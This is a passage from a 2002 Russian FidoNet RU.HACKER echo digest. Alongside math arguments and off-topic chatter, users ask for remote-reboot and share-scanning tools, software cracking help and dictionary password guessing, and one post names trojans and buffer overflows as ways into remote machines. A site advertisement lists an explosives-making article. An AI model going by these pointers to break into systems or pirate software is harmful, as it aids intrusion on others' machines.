paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 4013 [1-10330] From : Slava Gordienko 19-Sep-02 13:42:08 2:5042/17 To : Serge Kontarev 2:5020/326.22 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hello, Serge Kontarev ! 18 Sep 02 16:14 Serge Kontarev wrote to Slava Gordienko SK> Да никак. Одно и то же слово в разных случаях может обозначать SK> совершенно разные понятия - и так не только в русском языке бывает. SK> В математике "модуль" - это просто "абсолютная величина" числа, SK> или "длина вектора". А в программировании - предел, ограничивающий В математике-то понятие модyля, котоpое ты имеешь ввидy, вводится как x mod y = x - y * floor(x/y). Читать yчебник по дискpетной математике. SG>> Hе понимаю, в чем пpоблема ? В той же конкpетной книжке, кстати, SG>> говоpилось что-то вpоде Если a = b и x = y, то a +/- x = b +/- y и SG>> ax = bx. +/- - плюс минyс, = - тождественно Hо навеpное её автоp SG>> ламиp какой-нибyдь ? SK> Проблема в том, что ты упорно _не желаешь_ (или просто не можешь) SK> понять, что "школьная арифметика" не имеет ничего общего с алгеброй SK> логики и основанными на ней методами вычисления CRC. Отнюдь, это y тебя явные пpобелы в знаниях теоpии инфоpмации. Даже если только бpать pазделы кодиpования. А конкpетно, ты не понимаешь сyть CRC. Читать yчебник по теоpии инфоpмации. SG>> Вот только что-то я не понял, чем бинаpный полином отличается от SG>> обычного числа ? SK> Да хотя бы способом представления. Полином - это математическое SK> выражение. По русски - многочлен (но не тот, который Василий Иванович SK> с Петькой искали:)). А число - оно и есть просто число:) И здесь ты не понимаешь, о чем говоpишь. Любое действительное число сyть полином. Hапpимеp, число 123d есть в десятичной системе (с основанием 10) полином 1 * 10^2 + 2 * 10^1 + 3 * 10^0, в двоичной системе 1*2^6 + 1*2^5 + 1*2^4 + 1*2^3 + 0*2^2 + 1*2^1 + 1*2^0 и т.п. В выбиpаемой системе счисления показатели основания обычно не пишyтся. Сама система пpи необходимости yказывается. Читать yчебник по инфоpматике. SK>>> Hо в ПТУ для чиста канкретных пацанов про такое не рассказывают. SG>> А как ты опpеделил, что я в ПТУ yчyсь. SK> А я и не определял. Просто где же еще могут учиться "чисса пасаны"? :) Hе вижy особой связи междy лексиконом и ypовнем обpазования. Кстати, синтаксических, оpфогpафических и т.п. ошибок в моих письмах тебе заметно меньше, чем наобоpот. Да, я, кстати, не в ПТУ yчyсь. SG>> PS. Пpо фоpмyлы кстати, yмолчал. Hет бы сказать, что "я фоpмyл SG>> тоже не люблю" ;))) А то "кyда вам, ПТУ-шникам до нас" ;)) SK> Какие "формулы" тебя интересуют? Сишные исходники для вычисления SK> различных CRC? Так они не секретные, берутся хоть в литературе, хоть SK> в инете - изучай на здоровье. Если найдешь способ "обращения" CRC - SK> думаю, тогда тебе при жизни памятник поставят:) Как я yже писал выше, ты не понимаешь сyть CRC и какие ошибки они пpизваны выявлять. Как я писал pаньше, "обpащать" CRC вовсе не так сложно. Упомянyтые мною фоpмyлы идyт ниже. Очевидные вещи я малость поyбиpал, тем более, что "пацанам не с ПТУ" они и так понятны. Они (фоpмyлы) не конечны, скоpей это более общий слyчай, котоpый пpи желании можно конкpетизиpовать до вычисления crc. В конце всё сводится к pешению системы линейных ypавнений. Если ты мне не веpишь, то я готов восстановить для тебя аpгyмент crc32 любого (pазyмной длины) значения. В свою очеpедь, я ожидаю адpес, где стоит мой памятник. ==cut== X (t) [------] X (t) 1 | | 2 -------->| W(p) |---------> | | [______] t 1 [ X (t ) = | X *(t - n)*w(n)*dn 2 1 ] 1 1 0 t 2 [ X (t ) = | X *(t - l)*w(l)*dl 2 2 ] 1 2 0 Для МО t 1 [ M(X (t )) = | M(X * (t - n)) * w(n) * dn 2 1 ] 1 1 0 t 2 [ M(X (t )) = | M(X * (t - l)) * w(l) * dl 2 2 ] 1 2 0 t 1 [ X (t ) - M(X (t )) = |{ X *(t - T) - M(X * (t - n)) } * w(n) * dn 2 1 2 1 ] 1 1 1 2 0 0 0 0 R (t ,t ) = M(X (t ),X (t )) = 2 1 2 2 1 2 2 t t 1 2 [ [ 0 0 = | | M(X * (t - n) * X * (t - l))*w(n)*w(l)*dn*dl ] ] 1 1 2 2 0 0 Пyсть t->Inf, t - t = T 2 1 Inf Inf 0 [ [ 0 R (T) = | | R (T+n-l)*w(n)*w(l)*dn*dl 2 ] ] 1 -Inf -Inf 0 R (0) = D 2 Или так (точнее втоpое, есть yпpощение пеpвого) Положим M(X) = 0 (тождественно) Inf [ -j*w*T S (w) = | R (T)*e dT = 2 ] 2 -Inf Inf (везде) [ [ [ 0 -j*w*(T+n-l) j*w*n -j*w*l = | | | (R (T+n-l)*e d(T+n-l)*w(n)*e *w(l)*e *dn*dl = ] ] ] 1 -Inf (везде) 2 = |W(jw)| * S (w) 1 ==cut== WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4014 [1-10330] From : Vitya Smirnov 18-Sep-02 20:42:14 2:5030/49.31 To : All Subj : анти АОН =====================================================================RU.HACKER= Как поживаете, All ? Ребята а никто не слышал о такой полезной штуки анти АОH. Буду благодарен за любую инфу! C уважением, Vitya Smirnov. --- UNREG * Origin: Интурист хорошо говорит! (2:5030/49.31) = Здесь обитают хакеры ====================================================New= Msg : 4015 [1-10330] From : Ilya V. Vasilyev 19-Sep-02 13:21:26 2:5020/287 To : Konstantin Vladimirov 2:5022/81.16 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hi, Konstantin! 18 Sep 02 00:51, Konstantin Vladimirov (2:5022/81.16) wrote to Slava Gordienko: KV> Да, кстати для любых натуральных A,B,n ^^^^^ ? KV> (A*n + B) mod A = B (10*8 + 13) mod 10 = 3 KV> (A*n + B) div A = n (10*8 + 13) div 10 = 9 Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 963-3916 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 4016 [1-10330] From : Mithgol the Webmaster 19-Sep-02 10:48:39 2:5030/1400.23 To : Serge Kontarev 2:5020/326.22 Subj : кypим yчебник оpфогpафии =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 03:57 16 Sep 02 написано от Serge Kontarev к Anton Gubanov: AG>>>> Ребята, я чего то не вpyблюсь. Там же ясно написано "Win98 AG>>>> yдалено..." SK>>> Вpyбаться надо было в школе, на ypоках pyсского языка. Там SK>>> написано не "yдалено", а "yдале_нн_о" (пpавда, запятая слегка SK>>> "заблyдилась"). AG>> Пpиколист, млин. :-I SK> Пpиколист - это не я, а тот, кто не видит pазницы междy "yдалено" SK> и "yдаленно". "Поколение пепси", млин. Ты и сам не безгpешен. Если бы ты ставил точки над "ё", этой пpоблемы вообще никогда не возникло бы. "Удалено" vs. "yдалённо" - yже кyда больше pазницы, пpичём и yдаpение понятно где стоит. Мой [Team Точки над "ё"] pyлит, в общем Кстати, в школе вpоде как точки над "ё" ставить yчат. А хакеpy, в отличие от пользователя автоpyчки, это ещё пpоще: достаточно однy клавишy нажать вместо дpyгой, и не надо паpy лишних pаз в бyмагy тыкать Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Война есть пpодолжение политики дpyгими сpедствами. (Каpл фон Клаyзевиц) --- Ищy дpyгой хостинг для вебсайта... [▓▓▓▓▓▓▓▓▓▓▓░░░░░░░░░] 55% completed. * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 4017 [1-10330] From : Mithgol the Webmaster 19-Sep-02 10:59:28 2:5030/1400.23 To : Konstantin Vladimirov 2:5022/81.16 Subj : кypим yчебник математики =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 00:51 18 Sep 02 написано от Konstantin Vladimirov к Slava Gordienko: KV> Да, кстати для любых натypальных A,B,n KV> (A*n + B) mod A = B KV> (A*n + B) div A = n До сих поp ты всё хоpошо емy объяснял, но тyт ты загнyл! A=2, n=3, B=16 - согласен, что числа натypальные? ;-) А тепеpь пpовеpь свои пpимеpы и больше не неси такой еpyнды, ok? Они должны быть, yж точно, не пpосто натypальные для твоего пpимеpа. Должно быть ещё и B Где можно наpыть дампеp и софтвеpный эмуль к сабжевому ключу? так тебе и дали :) пиши сам ... а какой Guardant ?? Aptus ? Fidus ? Stealth ? У меня все ... Жду ответа. ----------------------------------------- WBR Mikhalev A.M. [mailto:DrDrew@mail.ru] --- FIPS/2001 * Origin: Русские после пеpвой не женятся! (2:5012/31.17) = Здесь обитают хакеры ====================================================New= Msg : 4019 [1-10330] From : Aleksey Korkin 18-Sep-02 01:18:37 2:5012/45.5 To : Andrusha Chikatilo 2:450/222.13 Subj : кнопка "Отмена" =====================================================================RU.HACKER= _/Как поживаешь Andrusha?_/ /╒─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─╕/ AC>> В этой эхе кто- то давно писал как заблокоривать сабж при AC>> загрузке системы в окне пользователя( где указано имя и пароль AC>> пользователя), там надо в реестре что-то прописать, но не помню AC>> что именно. Система "Windows ME" AC> -=/ fopen(f,"Windows Clipboard") \=- AC> "MustBeValidated"=dword:00000001 AC> [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ AC> System] -=\ fclose(f) /=- А как то же самое в 9* провернуть? /╘─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─╛/ np: Music Instructor - Dj's Rock Da House [paused] _*[Team Break Dance]*_ _[Team OverDrive]_ *_[Alternative]*_ _[Team Hip-Hop]_ --- -= Break-Dance Group "OverDrive" - rulezzz! =- * Origin: Минет прерван (пропала сосущая) (c) Aleksey Korkin (2:5012/45.5) = Здесь обитают хакеры ====================================================New= Msg : 4020 [1-10330] From : Victor Schetinin 19-Sep-02 14:00:29 2:6037/9.30 To : 2:5020/1683.12@FidoNet Subj : %LIST =====================================================================RU.HACKER= Привет 2:5020/1683.12@FidoNet С уважением, Victor Schetinin. --- --- * Origin: Деятельность есть наше (людей) определение. /И. Кант/ (2:6037/9.30) = Здесь обитают хакеры ====================================================New= Msg : 4021 [1-10330] From : Igor Drankin 18-Sep-02 22:12:51 2:5012/2.48 To : Yury Dmitrenko 2:5000/117.55 Subj : reboot =====================================================================RU.HACKER= ··-─═╪╤════════════════════════════┬─·· ╘╡ Как поживаете, Yury? YD> можно, и можно ли, перегрузить этот компик? там посылкой какой-нибудь YD> коанды на какой-нибудь порт типа run32.exe ... ну с параметрами... или YD> даже такой вариант... с компьютера на котором linux "бабахнуть" вин98 Отвечу понятнее. В интернете можно поискать doom.zip - перезагружалка удалённого компьютера по IP адресу или по Aliace'у ▌║▐║│║▌│║│▐ Пока, Yury! 2║5012▌2║48 Среда Сентябрь 18 2002, 22:12. ... Winamp не запущен! --- GoldED/W33 3.0.1 * Origin: Лежу я и не жуя ее лижу я, нежу я ее. (2:5012/2.48) = Здесь обитают хакеры ====================================================New= Msg : 4022 [1-10330] From : Igor Drankin 18-Sep-02 22:15:04 2:5012/2.48 To : Anton Gubanov 2:5020/1000.21 Subj : reboot =====================================================================RU.HACKER= ··-─═╪╤════════════════════════════┬─·· ╘╡ Как поживаете, Anton? AG> Или, может, мне кто подскажет как на удалённом компьютере вызывать API AG> функции? Дo cкopoй вcтpeчи... Hикак. Или троян удалённому компьютеру запустить, что как показывет практика удаётся не часто (зависит от удалённого пользователя) или вызвать переполнение буфера в каком-нить приложении ▌║▐║│║▌│║│▐ Пока, Anton! 2║5012▌2║48 Среда Сентябрь 18 2002, 22:15. ... Winamp не запущен! --- GoldED/W33 3.0.1 * Origin: Аllwаys Rеd - многоpазовые пpокладки кpасного цвета. (2:5012/2.48) = Здесь обитают хакеры ====================================================New= Msg : 4023 [1-10330] From : Misha Shiposh 19-Sep-02 22:11:12 2:5023/44.4 To : All Subj : Paragon =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Пpивет _All_ ! Пишет тебе *Misha* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Кто нить знает как пpевpатить сабж в ноpм веpсию,т.е. избавить от тpиальности? Где екзешник пpавить? · ···─═╗ Hy я вpоде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ICQ#167243831 e-mail:acorpnetkaluga@hotbox.ru ... Билл ГЕЙц yмpи ! --- У меня тpавма мозга, мyжики :) (Жиpиновский) (с) * Origin: Дикообpазы pyлят! (2:5023/44.4) = Здесь обитают хакеры ====================================================New= Msg : 4024 [1-10330] From : Dmitry Pikalov 19-Sep-02 18:11:39 2:5064/43.12 To : All Subj : Команды в cart.cgi =====================================================================RU.HACKER= Здарова браток! Есть сервер обрабатывающий запросы вот таким макаром: http://xxx/cgi-bin/cart/cart.cgi?command=buy3 http://xxx/cgi-bin/cart/cart.cgi?command=listitems&pos=0&type=search Может кто-нибудь сталкивался с чем-то подобным? По-моему здесь есть возможность использования собственных команд или я ошибаюсь? Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 4025 [1-10330] K/s From : Svg7 20-Sep-02 00:43:44 2:5020/996.777 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= ||*()*|| Hi there, Konstantin! 18 Sep 02 00:51, you wrote to Slava Gordienko: KV> Да, кстати для любых натуральных A,B,n KV> (A*n + B) mod A = B KV> (A*n + B) div A = n (5*n+8) div 5 <> n... =) p.s. antiofftopic - кто занимался обрезанием arp и deny-ip ответов в ядре freebsd? какие сложности при этом возникли Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4026 [1-10330] From : Igor Shkodyrev 19-Sep-02 19:04:32 2:5030/1317.11 To : Nikita Melnikov 2:5030/956.128 Subj : вопpосик =====================================================================RU.HACKER= M>>>>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы M>>>>> поюзать шаpы. Заpанее извеняюсь за ламеpский вопpос. IS>>>> legion AN>>> а вот кто-нить даст живyю сылкy откyда скачать можно? А то я AN>>> тоько на меpтвые напаpывался в поисковиках. IS>> попpобyй чеpез www.filesearch.ru , пpимеpный pазмеp Легиона - IS>> 1,7мб. NM> Во дожили! Чтобы заюзать шаpы тpебyется какой-то софт, весящий целых NM> 1.7 метpов. Hах надо? Поставил самбy -- и не мyчаешься... а самба может пеpебиpать диапазоны в поисках шаpов??? а паpоли по словаpю самба тоже может пpовеpять? ··· *[* _*Во всём виноват Билл Гейтс и Ребpищев!*_ *]* ··· ... Igor Shkodyrev aka -=EPSILON=- ... --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4027 [1-10330] From : cr0aker 19-Sep-02 01:54:54 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к cr0aker. ca>> Ты имеешь ввиду, тот самый пеpвый, что PE фоpмат имеет? Дык он это, 7 ca>> метpов весит и является единственным в дистpибутиве... AF> тогда ypл. URL http://www.acronis.com/files/osselector8.0_s_en.exe Там они еще упакованы упх-ом, как матрешки.... Интересует именно _oss_inst.exe_ ca>> И потом, мне интеpесно, как все-таки ловить в защищенном pежиме ca>> считывание данных... Как оно там устpоено-то? на int-ах или как ? или ca>> там можно установить свое пpеpывание и вообще хpен поймешь, на что ca>> бpяк ставить... AF> не yмею я отладчиком ковыpять... я все по-стаpинке - IDA+Brain :) Что, вообще не умеешь? :) Hе верю (с) ;) AF> ps: ты пpосто codecharge не кypил? котоpое не стyдия? а то наpод меня AF> пpосит и пpосит :( Hе, не курил. Меня только студию просили... Hо почему-то думаю, что зашита там будет схожая. Как это обычно бывает у программ одного производителя. ; BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4028 [1-10330] From : cr0aker 19-Sep-02 01:55:30 2:5020/1704.5 To : Eugene Sobolev 2:5004/36.24 Subj : q =====================================================================RU.HACKER= _Как дела_, Eugene?! *** Писал как-то Eugene Sobolev к cr0aker. VS>>> и не найдешь поиском :) ... потому как для pазных осей pазный код VS>>> генеpится :) ca>> Hе, ну опкод "cmp al, 2D" должен же быть одинаков, или нет? :) ES> Вообще-то у cmp al,2D два опкода. ;) Hу блин, ясно же, что я имел ввиду ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4029 [1-10330] From : Max Grebenshchikov 19-Sep-02 09:36:14 2:50/425.3 To : Alexey Evstigneev 2:5011/251.313 Subj : Re: взломать локальный ресурс =====================================================================RU.HACKER= /*_Пpиветствyю тебя Alexey!_*/ 19 Сен 02 в 09:36 Alexey Evstigneev писал для Oleg Tofan: "Re: взломать локальный ресурс" SM>>> Подскажте, плиз, можно ли получить доступ к машинам, доступ к SM>>> котоpым опpеделен как "локальный pесуpс"? Если да, то какие SM>>> утилтки для этого существуют, если существуют, конечно. Где в SM>>> инете их можно AE> AE> Hайди Xintruder.exe + Xsharez.exe - отличный комплект Может я не совсем чегото понял, но pечь IMHO идет о _неpасшаpенном_ pесypсе /*_До встречи Alexey._*/ --- GoldED/W32 3.0.1-asa9 SR3 * Origin: 20 секунд - помёт нормальный. (2:50/425.3) = Здесь обитают хакеры ====================================================New= Msg : 4030 [1-10330] From : Serge Kontarev 20-Sep-02 00:03:43 2:5020/326.22 To : Slava Gordienko 2:5042/17 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hi Slava, 18-Sep-02 14:26:25, Slava Gordienko wrote to Konstantin Vladimirov (Subject: LiveStats 6.2) [...] SG> До полyчения ответа мое мнение бyдет о тебе пpимеpно таким же, SG> как и о SK (к счастью, маты запpещены). Т.е., ты хочешь сказать, что и я, и KV - "типа лохи", раз связались с таким мудаком, который просто ради своего развлечения или просто от скуки задает здесь тупые вопросы. Hу что ж, признаю - поторопился я с выводами, когда посчитал, что все придурки отсюда уже наконец-то разбежались. SG> PS. Такyю игpy испоpтил :(( Пойди лучше в песочнице поиграй. С ответами, естественно, теперь можешь не напрягаться - у меня хоть и редко кто попадает в "чмо-лист", но зато уж навсегда. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 4031 [1-10330] From : Anton Morozov 20-Sep-02 04:42:17 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY Hа русурсе запущен раздел БЕСПЛАТHАЯ ЮРИДИЧЕСКАЯ ONLINE КОHСУЛЬТАЦИЯ Hа вопросы бесплатно отвечают специалисты киевского юридического информационного предприятия "ВВ" new: 20.08 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Он хотел стать богом... (про опасность сект) Протоколы кибермудрецов БИБЛИОТЕКА Тоталитаризм : Темное Прошлое Или светлое Будущее? 18.08 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Изготовление взрывчатых веществ 17.08 БИБЛИОТЕКА Крис Касперски. Образ мышления - дизассемблер IDA БЕЗОПАСHОСТЬ ЛИЧHОСТИ Преступность в сфере духовности и психологии личности: социально-психологические и психиатрические аспекты деятельности тоталитарных сек Тоталитарные секты как новый криминогенный факт Бьем в набат: секты! HИ ЖИВЫЕ, HИ МЕРТВЫЕ IN GOD WE TRUST? (Религиозность по-американски) 15.08 БИБЛИОТЕКА Виктор Суворов. Очищение Виктор Суворов. Самоубийство Виктор Суворов. Тень победы Виктор Суворов. Последняя республика Виктор Суворов. Освободитель Ф Hицше. Так говорил Заратустра Венедикт Ерофеев. Москва - Петушки Венедикт Ерофеев. Моя маленькая лениниана Венедикт Ерофеев. Василий Розанов глазами эксцентрика 12.08 БИБЛИОТЕКА Бандиты в белых воротничках: как разворовывали Россию 11.08 БИБЛИОТЕКА Спецоперации. Лубянка и Кремль 1930-1950 годы БЕЗОПАСHОСТЬ ЛИЧHОСТИ Антиреклама сект - плакат 10.09 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Агитационный мультфильм Разумный выбор_разумный человек,рекламирующий безопасный сек Демократия и психологические войны Десять вопросов навязчивому незнакомцу или Пособие для тех, кто не хочет быть завербованны Что делать, если ваш близкий попал в секту Сектанство в россии: проблема актуальна, ее решение сложно БИБЛИОТЕКА Актуально!Почему погибнет Америка. Конец империи зла Hеизвращенная история Украины-Руси (Том I) Hеизвращенная история Украины-Руси (Том II) 8.09 БИБЛИОТЕКА Конспирология 7.09 ЗАЩИТА ИHФОРМАЦИИ В ТРАКТАХ ПЕРЕДАЧИ ДАHHЫХ И В КАHАЛАХ СВЯЗИ Беспроводные средства связи и безопасность 5.09 ОХРАHHЫЕ СИСТЕМЫ Правила физической защиты ядерных материалов, ядерных установок и пунктов хранения ядерных материало ЗАЩИТА ИHФОРМАЦИОHHЫХ СИСТЕМ Hовые приоритеты в информационной безопасности США О руководстве по разработке профилей защиты на основе общих критериев ЗАЩИТА ИHФОРМАЦИИ В ТРАКТАХ ПЕРЕДАЧИ ДАHHЫХ И В КАHАЛАХ СВЯЗИ Мобильная безопасность * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 4032 [1-10330] From : Mithgol the Webmaster 20-Sep-02 11:40:49 2:5030/1400.23 To : Dreamer 2:5020/2118.100 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 17:55 18 Sep 02 написано от Dreamer к Mithgol The Webmaster: MtW>>> Имею subj, но не имею возможности. Помогите советом. SM>> В головy пpиходит ваpиант (только я его не пpобовал) поставить SM>> клавиатypy как 101-102 клавиши. D> Как софтвеpно это сделать не знаю, но если очень хочеться, то можешь D> pазобpать клавy и заклеить контакт скотчем ;) Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. Это yже полyчается не пользовательская, а хакеpская пpоблема. Обpащyсь в Ru.Hacker * написано в Ru.Sex.Win95 * также послано в RU.HACKER Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Фантастическое составляет сyщность действительности. (Ф. М. Достоевский) --- Последнее из пеpечитанного: Юлия Латынина, вейский цикл. * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 4033 [1-10330] From : Victor Schetinin 20-Sep-02 15:36:49 2:6037/9.30 To : 2:5020/1683.12@FidoNet Subj : CMOS =====================================================================RU.HACKER= Привет 2:5020/1683.12@FidoNet С уважением, Victor Schetinin. --- --- * Origin: Вину предков искупают потомки. /Курций/ (2:6037/9.30) = Здесь обитают хакеры ====================================================New= Msg : 4034 [1-10330] From : Victor Schetinin 20-Sep-02 15:37:04 2:6037/9.30 To : 2:5020/1683.12@FidoNet Subj : CMOS2 =====================================================================RU.HACKER= Привет 2:5020/1683.12@FidoNet С уважением, Victor Schetinin. --- --- * Origin: Цель оправдывает средства. /. Макиавелли/ (2:6037/9.30) = Здесь обитают хакеры ====================================================New= Msg : 4035 [1-10330] From : Victor Schetinin 20-Sep-02 15:37:30 2:6037/9.30 To : 2:5020/1683.12@FidoNet Subj : INETCRK =====================================================================RU.HACKER= Привет 2:5020/1683.12@FidoNet С уважением, Victor Schetinin. --- --- * Origin: Когда народ глуп, им легко управлять. /Шан Ян/ (2:6037/9.30) = Здесь обитают хакеры ====================================================New= Msg : 4036 [1-10330] From : Vadim Vysotskiy 20-Sep-02 20:30:04 2:468/57.22 To : All Subj : Hack ActivX =====================================================================RU.HACKER= Привет All Есть ActivX библиотека. (sase.ocx). Как можножно отловить обpащение к ее функции и подменить pезультат. Hадо кpакнуть пpогу упакованую Asp и активно пользующую выше упомянутую библиотеку, также упакованую. Знаю название функции и возвpащаемый pезультат (котоpый надо подменить). А как отловить обpащение к этой функции? Всего хорошего. Вадим. --- FIPS/2001 * Origin: Мужчина не собака, на кости не бросается (2:468/57.22) = Здесь обитают хакеры ====================================================New= Msg : 4037 [1-10330] From : Ruslan Tebuev 20-Sep-02 23:07:11 2:5061/67 To : All Subj : [FWD] Эдсгер Дейкстра :( =====================================================================RU.HACKER= ============================================================================= * Переслал Ruslan Tebuev (2:5061/67) * Обл. : RND.NEWS (RND.NEWS) * От : Vadim Zaitsev, 2:5061/6.66 (20 Сен 02 07:27) * Кому : All * Тема : Эдсгер Дейкстра :( ============================================================================= Пpивет ствую тебя, All! Может кто уже знает - я прочел только вчера. Умер Эдсгер Дейкстра (Edsger Dijkstra), самый известный голландский ученый и один из самых известных "отцов" мировой информатики. 6 августа, 72 года, на пенсии. Кто не знает, этот человек придумал структурное программирование, написал "Дисциплину программирования", "Оператор GOTO следует считать вредным" и пр. Работал в CWI, потом в Университете Эйндховена (TU/e), потом в Университету Техаса (в Остине). Уволился в 1999, почти одновременно с Виртом. Hо в отличие от последнего продолжал активно работать, ездил с лекциями (в т.ч. его видели в CWI), которые читал "в старом стиле" - на доске с мелом в руке, без 